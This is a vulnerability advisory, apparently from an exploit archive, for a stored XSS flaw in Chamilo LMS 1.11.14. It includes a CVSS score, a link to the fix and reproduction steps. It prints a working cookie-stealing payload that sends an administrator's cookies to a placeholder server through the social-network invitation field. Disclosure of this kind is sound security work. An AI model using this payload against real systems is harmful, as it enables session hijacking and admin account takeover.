Chamilo LMS version 1.11.14 suffers from a persistent cross site scripting vulnerability.
46aaae3bca75f14ca4182e929dd60940d30948fc966d3884b3e4d144172812eb
# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
# Date: July 21 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://chamilo.org
# Software Link: https://chamilo.org
# Version: Chamilo-lms-1.11.x
# Tested on: Chamilo-lms-1.11.x
# CVE: CVE-2021-37391
#Publication:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Description: A user without privileges in Chamilo LMS 1.11.x can send an
invitation message to another user, e.g., the administrator, through
main/social/search.php,
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
the administration side via a stored XSS vulnerability via social network
the send invitation feature. .
CVE ID: CVE-2021-37391
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
URL:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Affected parameter: send private message - text field
Payload: <img src=x onerror=this.src='
http://yourserver/?c='+document.cookie>
Steps to reproduce:
1. Navigate to the social network menu
2. Select the victim profile
3. Add the payload on the text field
4. Submit the request and wait for the payload execution
*Impact:* By using this vulnerability, an unprivileged user can steal
cookies from an admin account or force the administrator to create an
account with admin privileges with an HTTP 302 redirect.
*Mitigation*: Update the Chamilo to the latest version.
*Fix*:
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
Com os meus melhores cumprimentos,
--
*Pedro Tavares*
Founder and Editor-in-Chief at seguranca-informatica.pt
Co-founder of CSIRT.UBI
Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>
seguranca-informatica.pt | @sirpedrotavares
<https://twitter.com/sirpedrotavares> | 0xSI_f33d
<https://feed.seguranca-informatica.pt/>